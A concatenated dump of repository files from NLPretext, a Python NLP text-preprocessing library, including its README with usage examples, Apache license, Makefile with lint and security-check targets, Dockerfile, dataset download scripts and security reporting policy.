help\n\nYou can contribute by spreading a word about this library.\nIt would also be a huge contribution to write\na short article on how you are using this project.\nYou can also share your best practices with us.\n\n# Docstring format\n\nWe chose to use **Numpydoc** over the several [standards](https://stackoverflow.com/questions/3898572/what-is-the-standard-python-docstring-format)\n\n```\n\"\"\"\nMy numpydoc description of a kind\nof very exhautive numpydoc format docstring.\n\nParameters\n----------\nfirst : array_like\n    the 1st param name `first`\nsecond :\n    the 2nd param\nthird : {'value', 'other'}, optional\n    the 3rd param, by default 'value'\n\nReturns\n-------\nstring\n    a value in a string\n\nRaises\n------\nKeyError\n    when a key error\nOtherError\n    when an other error\n\"\"\"\n```\n"
  },
  {
    "path": "LICENSE",
    "content": "                                   Apache License\n                           Version 2.0, January 2004\n                        http://www.apache.org/licenses/\n\n   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\n   1. Definitions.\n\n      \"License\" shall mean the terms and conditions for use, reproduction,\n      and distribution as defined by Sections 1 through 9 of this document.\n\n      \"Licensor\" shall mean the copyright owner or entity authorized by\n      the copyright owner that is granting the License.\n\n      \"Legal Entity\" shall mean the union of the acting entity and all\n      other entities that control, are controlled by, or are under common\n      control with that entity. For the purposes of this definition,\n      \"control\" means (i) the power, direct or indirect, to cause the\n      direction or management of such entity, whether by contract or\n      otherwise, or (ii) ownership of fifty percent (50%) or more of the\n      outstanding shares, or (iii) beneficial ownership of such entity.\n\n      \"You\" (or \"Your\") shall mean an individual or Legal Entity\n      exercising permissions granted by this License.\n\n      \"Source\" form shall mean the preferred form for making modifications,\n      including but not limited to software source code, documentation\n      source, and configuration files.\n\n      \"Object\" form shall mean any form resulting from mechanical\n      transformation or translation of a Source form, including but\n      not limited to compiled object code, generated documentation,\n      and conversions to other media types.\n\n      \"Work\" shall mean the work of authorship, whether in Source or\n      Object form, made available under the License, as indicated by a\n      copyright notice that is included in or attached to the work\n      (an example is provided in the Appendix below).\n\n      \"Derivative Works\" shall mean any work, whether in Source or Object\n      form, that is based on (or derived from) the Work and for which the\n      editorial revisions, annotations, elaborations, or other modifications\n      represent, as a whole, an original work of authorship. For the purposes\n      of this License, Derivative Works shall not include works that remain\n      separable from, or merely link (or bind by name) to the interfaces of,\n      the Work and Derivative Works thereof.\n\n      \"Contribution\" shall mean any work of authorship, including\n      the original version of the Work and any modifications or additions\n      to that Work or Derivative Works thereof, that is intentionally\n      submitted to Licensor for inclusion in the Work by the copyright owner\n      or by an individual or Legal Entity authorized to submit on behalf of\n      the copyright owner. For the purposes of this definition, \"submitted\"\n      means any form of electronic, verbal, or written communication sent\n      to the Licensor or its representatives, including but not limited to\n      communication on electronic mailing lists, source code control systems,\n      and issue tracking systems that are managed by, or on behalf of, the\n      Licensor for the purpose of discussing and improving the Work, but\n      excluding communication that is conspicuously marked or otherwise\n      designated in writing by the copyright owner as \"Not a Contribution.\"\n\n      \"Contributor\" shall mean Licensor and any individual or Legal Entity\n      on behalf of whom a Contribution has been received by Licensor and\n      subsequently incorporated within the Work.\n\n   2. Grant of Copyright License. Subject to the terms and conditions of\n      this License, each Contributor hereby grants to You a perpetual,\n      worldwide, non-exclusive, no-charge, royalty-free, irrevocable\n      copyright license to reproduce, prepare Derivative Works of,\n      publicly display, publicly perform, sublicense, and distribute the\n      Work and such Derivative Works in Source or Object form.\n\n   3. Grant of Patent License. Subject to the terms and conditions of\n      this License, each Contributor hereby grants to You a perpetual,\n      worldwide, non-exclusive, no-charge, royalty-free, irrevocable\n      (except as stated in this section) patent license to make, have made,\n      use, offer to sell, sell, import, and otherwise transfer the Work,\n      where such license applies only to those patent claims licensable\n      by such Contributor that are necessarily infringed by their\n      Contribution(s) alone or by combination of their Contribution(s)\n      with the Work to which such Contribution(s) was submitted. If You\n      institute patent litigation against any entity (including a\n      cross-claim or counterclaim in a lawsuit) alleging that the Work\n      or a Contribution incorporated within the Work constitutes direct\n      or contributory patent infringement, then any patent licenses\n      granted to You under this License for that Work shall terminate\n      as of the date such litigation is filed.\n\n   4. Redistribution. You may reproduce and distribute copies of the\n      Work or Derivative Works thereof in any medium, with or without\n      modifications, and in Source or Object form, provided that You\n      meet the following conditions:\n\n      (a) You must give any other recipients of the Work or\n          Derivative Works a copy of this License; and\n\n      (b) You must cause any modified files to carry prominent notices\n          stating that You changed the files; and\n\n      (c) You must retain, in the Source form of any Derivative Works\n          that You distribute, all copyright, patent, trademark, and\n          attribution notices from the Source form of the Work,\n          excluding those notices that do not pertain to any part of\n          the Derivative Works; and\n\n      (d) If the Work includes a \"NOTICE\" text file as part of its\n          distribution, then any Derivative Works that You distribute must\n          include a readable copy of the attribution notices contained\n          within such NOTICE file, excluding those notices that do not\n          pertain to any part of the Derivative Works, in at least one\n          of the following places: within a NOTICE text file distributed\n          as part of the Derivative Works; within the Source form or\n          documentation, if provided along with the Derivative Works; or,\n          within a display generated by the Derivative Works, if and\n          wherever such third-party notices normally appear. The contents\n          of the NOTICE file are for informational purposes only and\n          do not modify the License. You may add Your own attribution\n          notices within Derivative Works that You distribute, alongside\n          or as an addendum to the NOTICE text from the Work, provided\n          that such additional attribution notices cannot be construed\n          as modifying the License.\n\n      You may add Your own copyright statement to Your modifications and\n      may provide additional or different license terms and conditions\n      for use, reproduction, or distribution of Your modifications, or\n      for any such Derivative Works as a whole, provided Your use,\n      reproduction, and distribution of the Work otherwise complies with\n      the conditions stated in this License.\n\n   5. Submission of Contributions. Unless You explicitly state otherwise,\n      any Contribution intentionally submitted for inclusion in the Work\n      by You to the Licensor shall be under the terms and conditions of\n      this License, without any additional terms or conditions.\n      Notwithstanding the above, nothing herein shall supersede or modify\n      the terms of any separate license agreement you may have executed\n      with Licensor regarding such Contributions.\n\n   6. Trademarks. This License does not grant permission to use the trade\n      names, trademarks, service marks, or product names of the Licensor,\n      except as required for reasonable and customary use in describing the\n      origin of the Work and reproducing the content of the NOTICE file.\n\n   7. Disclaimer of Warranty. Unless required by applicable law or\n      agreed to in writing, Licensor provides the Work (and each\n      Contributor provides its Contributions) on an \"AS IS\" BASIS,\n      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n      implied, including, without limitation, any warranties or conditions\n      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A\n      PARTICULAR PURPOSE. You are solely responsible for determining the\n      appropriateness of using or redistributing the Work and assume any\n      risks associated with Your exercise of permissions under this License.\n\n   8. Limitation of Liability. In no event and under no legal theory,\n      whether in tort (including negligence), contract, or otherwise,\n      unless required by applicable law (such as deliberate and grossly\n      negligent acts) or agreed to in writing, shall any Contributor be\n      liable to You for damages, including any direct, indirect, special,\n      incidental, or consequential damages of any character arising as a\n      result of this License or out of the use or inability to use the\n      Work (including but not limited to damages for loss of goodwill,\n      work stoppage, computer failure or malfunction, or any and all\n      other commercial damages or losses), even if such Contributor\n      has been advised of the possibility of such damages.\n\n   9. Accepting Warranty or Additional Liability. While redistributing\n      the Work or Derivative Works thereof, You may choose to offer,\n      and charge a fee for, acceptance of support, warranty, indemnity,\n      or other liability obligations and/or rights consistent with this\n      License. However, in accepting such obligations, You may act only\n      on Your own behalf and on Your sole responsibility, not on behalf\n      of any other Contributor, and only if You agree to indemnify,\n      defend, and hold each Contributor harmless for any liability\n      incurred by, or claims asserted against, such Contributor by reason\n      of your accepting any such warranty or additional liability.\n\n   END OF TERMS AND CONDITIONS\n\n   APPENDIX: How to apply the Apache License to your work.\n\n      To apply the Apache License to your work, attach the following\n      boilerplate notice, with the fields enclosed by brackets \"[]\"\n      replaced with your own identifying information. (Don't include\n      the brackets!)  The text should be enclosed in the appropriate\n      comment syntax for the file format. We also recommend that a\n      file or class name and description of purpose be included on the\n      same \"printed page\" as the copyright notice for easier\n      identification within third-party archives.\n\n   Copyright [yyyy] [name of copyright owner]\n\n   Licensed under the Apache License, Version 2.0 (the \"License\");\n   you may not use this file except in compliance with the License.\n   You may obtain a copy of the License at\n\n       http://www.apache.org/licenses/LICENSE-2.0\n\n   Unless required by applicable law or agreed to in writing, software\n   distributed under the License is distributed on an \"AS IS\" BASIS,\n   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n   See the License for the specific language governing permissions and\n   limitations under the License.\n© 2021 GitHub, Inc.\nTerms\nPrivacy\nSecurity\nStatus\nDocs\nContact GitHub\nPricing\nAPI\nTraining\nBlog\nAbout\n"
  },
  {
    "path": "Makefile",
    "content": "SHELL := /usr/bin/env bash\n\nIMAGE := nlpretext\nVERSION := latest\n\nNO_CHECK_FLAG =  || true\n\nifeq ($(STRICT), 1)\n\tPOETRY_COMMAND_FLAG =\n\tPIP_COMMAND_FLAG =\n\tSAFETY_COMMAND_FLAG =\n\tBANDIT_COMMAND_FLAG =\n\tSECRETS_COMMAND_FLAG =\n\tBLACK_COMMAND_FLAG =\n\tDARGLINT_COMMAND_FLAG =\n\tISORT_COMMAND_FLAG =\n\tMYPY_COMMAND_FLAG =\nelse\n\tPOETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tPIP_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tSAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tBANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tSECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tBLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tDARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tMYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(POETRY_STRICT), 1)\n\tPOETRY_COMMAND_FLAG =\nelse ifeq ($(POETRY_STRICT), 0)\n\tPOETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(PIP_STRICT), 1)\n\tPIP_COMMAND_FLAG =\nelse ifeq ($(PIP_STRICT), 0)\n\tPIP_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(SAFETY_STRICT), 1)\n\tSAFETY_COMMAND_FLAG =\nelse ifeq ($(SAFETY_STRICT), 0)\n\tSAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(BANDIT_STRICT), 1)\n\tBANDIT_COMMAND_FLAG =\nelse ifeq ($(BANDIT_STRICT), 0)\n\tBANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(SECRETS_STRICT), 1)\n\tSECRETS_COMMAND_FLAG =\nelse ifeq ($(SECRETS_STRICT), 0)\n\tSECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(BLACK_STRICT), 1)\n\tBLACK_COMMAND_FLAG =\nelse ifeq ($(BLACK_STRICT), 0)\n\tBLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(DARGLINT_STRICT), 1)\n\tDARGLINT_COMMAND_FLAG =\nelse ifeq ($(DARGLINT_STRICT), 0)\n\tDARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(ISORT_STRICT), 1)\n\tISORT_COMMAND_FLAG =\nelse ifeq ($(ISORT_STRICT), 0)\n\tISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(MYPY_STRICT), 1)\n\tMYPY_COMMAND_FLAG =\nelse ifeq ($(MYPY_STRICT), 0)\n\tMYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\n.PHONY: download-poetry\ndownload-poetry:\n\tcurl -sSL https://install.python-poetry.org | python3 -\n\n.PHONY: install\ninstall:\n\tpoetry env use python3.10\n\tpoetry lock -n\n\tpoetry install -n\nifneq ($(NO_PRE_COMMIT), 1)\n\tpoetry run pre-commit install -t pre-commit -t pre-push\nendif\n\n.PHONY: check-safety\ncheck-safety:\n\tpoetry check$(POETRY_COMMAND_FLAG) && \\\n\tpoetry run pip check$(PIP_COMMAND_FLAG) && \\\n\tpoetry run safety check --full-report$(SAFETY_COMMAND_FLAG) && \\\n\tpoetry run bandit -r nlpretext/$(BANDIT_COMMAND_FLAG)\n\n.PHONY: gitleaks\ngitleaks:\n\tcommits=\"$$(git rev-list --ancestry-path $$(git rev-parse $$(git branch -r --sort=committerdate | tail -1))..$$(git rev-parse HEAD))\"; \\\n\tif [ \"$${commits}\" != \"\" ]; then docker run --rm -v $$(pwd):/code/ zricethezav/gitleaks --path=/code/ -v --commits=$$(echo $${commits} | paste -s -d, -)$(SECRETS_COMMAND_FLAG); fi;\n\n.PHONY: format-code\nformat-code:\n\tpoetry run pre-commit run --all\n\n.PHONY: test\ntest:\n\tpoetry run pytest\n\n.PHONY: lint\nlint: check-safety format-code test\n\n# Example: make docker VERSION=latest\n# Example: make docker IMAGE=some_name VERSION=1.0.4\n.PHONY: docker\ndocker:\n\t@echo Building docker $(IMAGE):$(VERSION) ...\n\tdocker build \\\n\t\t-t $(IMAGE):$(VERSION) . \\\n\t\t-f ./docker/Dockerfile\n\n# Example: make clean_docker VERSION=latest\n# Example: make clean_docker IMAGE=some_name VERSION=1.0.4\n.PHONY: clean_docker\nclean_docker:\n\t@echo Removing docker $(IMAGE):$(VERSION) ...\n\tdocker rmi -f $(IMAGE):$(VERSION)\n\n.PHONY: clean_build\nclean_build:\n\trm -rf build/\n\n.PHONY: clean\nclean: clean_build clean_docker\n"
  },
  {
    "path": "README.md",
    "content": "# NLPretext\n\n<p align=\"center\">\n    <img src=\"/references/logo_nlpretext.png\" />\n</p>\n\n<div align=\"center\">\n\n[![CI status](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml/badge.svg?branch%3Amain&event%3Apush)](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml?query=branch%3Amain)\n[![CD status](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml/badge.svg?event%3Arelease)](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml?query=event%3Arelease)\n[![Python Version](https://img.shields.io/badge/Python-3.8-informational.svg)](#supported-python-versions)\n[![Dependencies Status](https://img.shields.io/badge/dependabots-active-informational.svg)](https://github.com/artefactory/NLPretext}/pulls?utf8=%E2%9C%93&q=is%3Apr%20author%3Aapp%2Fdependabot)\n\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![Security: bandit](https://img.shields.io/badge/security-bandit-informational.svg)](https://github.com/PyCQA/bandit)\n[![Pre-commit](https://img.shields.io/badge/pre--commit-enabled-informational?logo=pre-commit&logoColor=white)](https://github.com/artefactory/NLPretext}/blob/main/.pre-commit-config.yaml)\n[![Semantic Versions](https://img.shields.io/badge/%F0%9F%9A%80-semantic%20versions-informational.svg)](https://github.com/artefactory/NLPretext/releases)\n[![Documentation](https://img.shields.io/badge/doc-sphinx-informational.svg)](https://github.com/artefactory/NLPretext}/tree/main/docs)\n[![License](https://img.shields.io/badge/License-Apache%20Software%20License%202.0-informational.svg)](https://github.com/artefactory/NLPretext}/blob/main/LICENSE)\n\nAll the goto functions you need to handle NLP use-cases, integrated in NLPretext\n\n</div>\n\n# TL;DR\n\n\n> *Working on an NLP project and tired of always looking for the same silly preprocessing functions on the web?*  :tired_face:\n\n> *Need to efficiently extract email adresses from a document? Hashtags from tweets? Remove accents from a French post?* :disappointed_relieved:\n\n\n**NLPretext got you covered!** :rocket:\n\nNLPretext packages in a **unique** library all the text **preprocessing** functions you need to **ease** your NLP project.\n\n\n:mag: Quickly explore below our preprocessing pipelines and individual functions referential.\n\n* [Default preprocessing pipeline](#default_pipeline)\n* [Custom preprocessing pipeline](#custom_pipeline)\n* [Replacing phone numbers](#replace_phone_numbers)\n* [Removing hashtags](#remove_hashtags)\n* [Extracting emojis](#extract_emojis)\n* [Data augmentation](#data_augmentation)\n\n\nCannot find what you were looking for? Feel free to open an [issue]((https://github.com/artefactory/nlpretext/issues) ).\n\n\n\n# Installation\n\n### Supported Python Versions\n\n- Main version supported : `3.8`\n- Other supported versions : `3.9`, `3.10`\n\n\nWe strongly advise you to do the remaining steps in a virtual environnement.\n\nTo install this library from PyPi, run the following command:\n\n```bash\npip install nlpretext\n```\n\nor with `Poetry`\n\n```bash\npoetry add nlpretext\n```\n\n\n# Usage\n\n## Default pipeline <a name=\"default_pipeline\"></a>\n\nNeed to preprocess your text data but no clue about what function to use and in which order? The default preprocessing pipeline got you covered:\n\n```python\nfrom nlpretext import Preprocessor\ntext = \"I just got the best dinner in my life @latourdargent !!! I  recommend 😀 #food #paris \\n\"\npreprocessor = Preprocessor()\ntext = preprocessor.run(text)\nprint(text)\n# \"I just got the best dinner in my life!!! I recommend\"\n```\n\n## Create your custom pipeline <a name=\"custom_pipeline\"></a>\n\nAnother possibility is to create your custom pipeline if you know exactly what function to apply on your data, here's an example:\n\n```python\nfrom nlpretext import Preprocessor\nfrom nlpretext.basic.preprocess import (normalize_whitespace, remove_punct, remove_eol_characters,\nremove_stopwords, lower_text)\nfrom nlpretext.social.preprocess import remove_mentions, remove_hashtag, remove_emoji\ntext = \"I just got the best dinner in my life @latourdargent !!! I  recommend 😀 #food #paris \\n\"\npreprocessor = Preprocessor()\npreprocessor.pipe(lower_text)\npreprocessor.pipe(remove_mentions)\npreprocessor.pipe(remove_hashtag)\npreprocessor.pipe(remove_emoji)\npreprocessor.pipe(remove_eol_characters)\npreprocessor.pipe(remove_stopwords, args={'lang': 'en'})\npreprocessor.pipe(remove_punct)\npreprocessor.pipe(normalize_whitespace)\ntext = preprocessor.run(text)\nprint(text)\n# \"dinner life recommend\"\n```\n\nTake a look at all the functions that are available [here](https://github.com/artefactory/NLPretext/tree/master/nlpretext) in the ```preprocess.py``` scripts in the different folders: basic, social, token.\n\n\n## Load text data\n\nPre-processing text data is useful only if you have loaded data to process! Importing text data as strings in your code can be really simple if you have short texts contained in a local .txt, but it can quickly become difficult if you want to load a lot of texts, stored in multiple formats and divided in multiple files. Hopefully, you can use NLPretext's TextLoader class to easily import text data.\nwhile it is not mandatory our textLoader work best with dask, make sure to have the librairy installed if you want the best performances.\n\n```python\nfrom nlpretext.textloader import TextLoader\nfiles_path = \"local_folder/texts/text.txt\"\ntext_loader = TextLoader(use_dask=True)\ntext_dataframe = text_loader.read_text(files_path)\nprint(text_dataframe.text.values.tolist())\n# [\"I just got the best dinner in my life!!!\",  \"I recommend\", \"It was awesome\"]\n```\n\nFile path can be provided as string, list of strings, with or without wildcards. It also supports imports from cloud providers, if your machine is authentified on a project.\n\n```python\ntext_loader = TextLoader(text_column=\"name_of_text_column_in_your_data\")\n\nlocal_file_path = \"local_folder/texts/text.csv\" # File from local folder\nlocal_corpus_path = [\"local_folder/texts/text_1.csv\", \"local_folder/texts/text_2.csv\", \"local_folder/texts/text_3.csv\"] # Multiple files from local folder\n\ngcs_file_path = \"gs://my-bucket/texts/text.json\" # File from GCS\ns3_file_path = \"s3://my-bucket/texts/text.json\" # File from S3\nhdfs_file_path = \"hdfs://folder/texts/text.txt\" # File from HDFS\nazure_file_path = \"az://my-bucket/texts/text.parquet\" # File from Azure\n\ngcs_corpus_path = \"gs://my-bucket/texts/text_*.json\" # Multiple files from GCS with wildcard\n\ntext_dataframe_1 = text_loader.read_text(local_file_path)\ntext_dataframe_2 = text_loader.read_text(local_corpus_path)\ntext_dataframe_3 = text_loader.read_text(gcs_file_path)\ntext_dataframe_4 = text_loader.read_text(s3_file_path)\ntext_dataframe_5 = text_loader.read_text(hdfs_file_path)\ntext_dataframe_6 = text_loader.read_text(azure_file_path)\ntext_dataframe_7 = text_loader.read_text(gcs_corpus_path)\n\n```\n\nYou can also specify a Preprocessor if you want your data to be directly pre-processed when loaded.\n```python\ntext_loader = TextLoader(text_column=\"text_col\")\npreprocessor = Preprocessor()\n\nfile_path = \"local_folder/texts/text.csv\" # File from local folder\n\nraw_text_dataframe = text_loader.read_text(local_file_path)\npreprocessed_text_dataframe = text_loader.read_text(local_file_path, preprocessor=preprocessor)\n\nprint(raw_text_dataframe.text_col.values.tolist())\n# [\"These   texts are not preprocessed\",  \"This is bad ## \"]\n\nprint(preprocessed_text_dataframe.text_col.values.tolist())\n# [\"These texts are not preprocessed\",  \"This is bad\"]\n```\n\n\n## Individual Functions\n\n### Replacing emails <a name=\"replace_emails\"></a>\n\n```python\nfrom nlpretext.basic.preprocess import replace_emails\nexample = \"I have forwarded this email to obama@whitehouse.gov\"\nexample = replace_emails(example, replace_with=\"*EMAIL*\")\nprint(example)\n# \"I have forwarded this email to *EMAIL*\"\n```\n\n### Replacing phone numbers <a name=\"replace_phone_numbers\"></a>\n\n```python\nfrom nlpretext.basic.preprocess import replace_phone_numbers\nexample = \"My phone number is 0606060606\"\nexample = replace_phone_numbers(example, country_to_detect=[\"FR\"], replace_with=\"*PHONE*\")\nprint(example)\n# \"My phone number is *PHONE*\"\n```\n\n### Removing Hashtags <a name=\"remove_hashtags\"></a>\n\n```python\nfrom nlpretext.social.preprocess import remove_hashtag\nexample = \"This restaurant was amazing #food #foodie #foodstagram #dinner\"\nexample = remove_hashtag(example)\nprint(example)\n# \"This restaurant was amazing\"\n```\n\n### Extracting emojis <a name=\"extract_emojis\"></a>\n\n```python\nfrom nlpretext.social.preprocess import extract_emojis\nexample = \"I take care of my skin 😀\"\nexample = extract_emojis(example)\nprint(example)\n# [':grinning_face:']\n```\n\n## Data augmentation <a name=\"data_augmentation\"></a>\n\nThe augmentation module helps you to **generate new texts** based on your given examples by modifying some words in the initial ones and to **keep associated entities unchanged**, if any, in the case of **NER tasks**. If you want words other than entities to remain unchanged, you can specify it within the `stopwords` argument. Modifications depend on the chosen method, the ones currently supported by the module are **substitutions with synonyms** using Wordnet or BERT from the [`nlpaug`](https://github.com/makcedward/nlpaug) library.\n\n```python\nfrom nlpretext.augmentation.text_augmentation import augment_text\nexample = \"I want to buy a small black handbag please.\"\nentities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}]\nexample = augment_text(example, method=”wordnet_synonym”, entities=entities)\nprint(example)\n# \"I need to buy a small black pocketbook please.\"\n```\n\n\n\n\n# 📈 Releases\n\nYou can see the list of available releases on the [GitHub Releases](https://github.com/artefactory/NLPretext}/releases) page.\n\nWe follow [Semantic Versions](https://semver.org/) specification.\n\nWe use [`Release Drafter`](https://github.com/marketplace/actions/release-drafter). As pull requests are merged, a draft release is kept up-to-date listing the changes, ready to publish when you’re ready. With the categories option, you can categorize pull requests in release notes using labels.\n\nFor Pull Requests, these labels are configured, by default:\n\n|               **Label**               |  **Title in Releases**  |\n| :-----------------------------------: | :---------------------: |\n|       `enhancement`, `feature`        |       🚀 Features       |\n| `bug`, `refactoring`, `bugfix`, `fix` | 🔧 Fixes & Refactoring  |\n|       `build`, `ci`, `testing`        | 📦 Build System & CI/CD |\n|              `breaking`               |   💥 Breaking Changes   |\n|            `documentation`            |    📝 Documentation     |\n|            `dependencies`             | ⬆️ Dependencies updates |\n\n\nGitHub creates the `bug`, `enhancement`, and `documentation` labels automatically. Dependabot creates the `dependencies` label. Create the remaining labels on the Issues tab of the GitHub repository, when needed.## 🛡 License\n\n[![License](https://img.shields.io/github/license/artefactory/NLPretext)](https://github.com/artefactory/NLPretext}/blob/main/LICENSE)\n\nThis project is licensed under the terms of the `Apache Software License 2.0` license. See [LICENSE](https://github.com/artefactory/NLPretext}/blob/main/LICENSE) for more details.## 📃 Citation\n\n```\n@misc{nlpretext,\n  author = {artefactory},\n  title = {All the goto functions you need to handle NLP use-cases, integrated in NLPretext},\n  year = {2021},\n  publisher = {GitHub},\n  journal = {GitHub repository},\n  howpublished = {\\url{https://github.com/artefactory/NLPretext}}}\n}\n```\n\n\n# Project Organization\n------------\n\n    .\n    ├── .github/workflows           <- Where the CI and CD lives\n    ├── datasets/external           <- Bash scripts to download external datasets\n    ├── docker                      <- All you need to build a Docker image from that package\n    ├── docs                        <- Sphinx HTML documentation\n    ├── nlpretext                   <- Main Package. This is where the code lives\n    │   ├── preprocessor.py         <- Main preprocessing script\n    │   ├── text_loader.py          <- Main loading script\n    │   ├── augmentation            <- Text augmentation script\n    │   ├── basic                   <- Basic text preprocessing\n    │   ├── cli                     <- Command lines that can be used\n    │   ├── social                  <- Social text preprocessing\n    │   ├── token                   <- Token text preprocessing\n    │   ├── textloader              <- File loading\n    │   ├── _config                 <- Where the configuration and constants live\n    │   └── _utils                  <- Where preprocessing utils scripts lives\n    ├── references                  <- assets\n    ├── tests                       <- Where the tests lives\n    ├── .gitignore\n    ├── .pre-commit-config.yaml     <- Pre-commit configuration\n    ├── CODE_OF_CONDUCT.md          <- Code of conduct guidelines\n    ├── CONTRIBUTING.md             <- Contribution guidelines\n    ├── LICENSE\n    ├── Makefile\n    ├── pyproject.toml              <- Package build configuration\n    ├── README.md                   <- The top-level README for developers using this project.\n    └── SECURITY.md\n\n# Credits\n\n- [textacy](https://github.com/chartbeat-labs/textacy) for the following basic preprocessing functions:\n    - `fix_bad_unicode`\n    - `normalize_whitespace`\n    - `unpack_english_contractions`\n    - `replace_urls`\n    - `replace_emails`\n    - `replace_numbers`\n    - `replace_currency_symbols`\n    - `remove_punct`\n    - `remove_accents`\n    - `replace_phone_numbers` *(with some modifications of our own)*\n"
  },
  {
    "path": "SECURITY.md",
    "content": "# Security\n\n## 🔐 Reporting Security Issues\n\n> Do not open issues that might have security implications!\n> It is critical that security related issues are reported privately so we have time to address them before they become public knowledge.\n\nVulnerabilities can be reported by emailing core members:\n\n- artefactory [jules.bertrand@artefact.com](mailto:jules.bertrand@artefact.com)\n\nPlease include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue:\n\n- Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.)\n- Full paths of source file(s) related to the manifestation of the issue\n- The location of the affected source code (tag/branch/commit or direct URL)\n- Any special configuration required to reproduce the issue\n- Environment (e.g. Linux / Windows / macOS)\n- Step-by-step instructions to reproduce the issue\n- Proof-of-concept or exploit code (if possible)\n- Impact of the issue, including how an attacker might exploit the issue\n\nThis information will help us triage your report more quickly.\n\n## Preferred Languages\n\nWe prefer all communications to be in English.\n"
  },
  {
    "path": "datasets/external/get_language_dataset.sh",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n#!/bin/bash\nwget -O wili.zip https://zenodo.org/record/841984/files/wili-2018.zip?download=1\nmkdir -p wili && cp wili.zip wili && cd wili && unzip wili.zip && cd ..\n"
  },
  {
    "path": "datasets/external/get_stanfordtweets.sh",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n#!/bin/bash\nwget -O trainingandtestdata.zip http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip trainingandtestdata.zip\nmkdir -p  tweets_sentiment && cp trainingandtestdata.zip tweets_sentiment && cd tweets_sentiment && unzip trainingandtestdata.zip\n"
  },
  {
    "path": "docker/Dockerfile",
    "content": "FROM python:3.10-slim-buster\n\nENV LANG=C.UTF-8 \\\n  LC_ALL=C.UTF-8\n\nRUN apt-get update && \\\n  apt-get install -y --no-install-recommends \\\n  curl coreutils \\\n  && rm -rf /var/lib/apt/lists/*\n\n  # Install Poetry\nENV POETRY_VERSION=1.5.1\nRUN pip install --upgrade pip\nRUN python3 -m pip install \"poetry==$POETRY_VERSION\"\n\nWORKDIR /home/workspace\n\nCOPY pyproject.toml ./\n\nRUN poetry config virtualenvs.create false \\\n  && poetry lock \\\n  && poetry install --no-root --no-dev --no-interaction\n\nCOPY . /home/docker_user/workspace/\n\nENTRYPOINT [\"poetry\", \"run\", \"nlpretext\"]\n"
  },
  {
    "path": "docker/README.md",
    "content": "# Docker for nlpretext\n\n## Installation\n\nTo create Docker you need to run:\n\n```bash\nmake docker\n```\n\nwhich is equivalent to:\n\n```bash\nmake docker VERSION=latest\n```\n\nYou could also provide name and version for the image itself.\nDefault name is `IMAGE := nlpretext`.\nDefault version is `VERSION := latest`.\n\n```bash\nmake docker IMAGE=some_name VERSION=1.0.4\n```\n\n## Usage\n\n```bash\ndocker run -it --rm \\\n   -v $(pwd):/workspace \\\n   nlpretext bash\n```\n\n## How to clean up\n\nTo uninstall docker image run `make clean_docker` with `VERSION`:\n\n```bash\nmake clean_docker VERSION=1.0.4\n```\n\nlike in installation, you can also choose the image name\n\n```bash\nmake clean_docker IMAGE=some_name VERSION=latest\n```\n\nIf you want to clean all, including `build` run `make clean`\n"
  },
  {
    "path": "docs/Makefile",
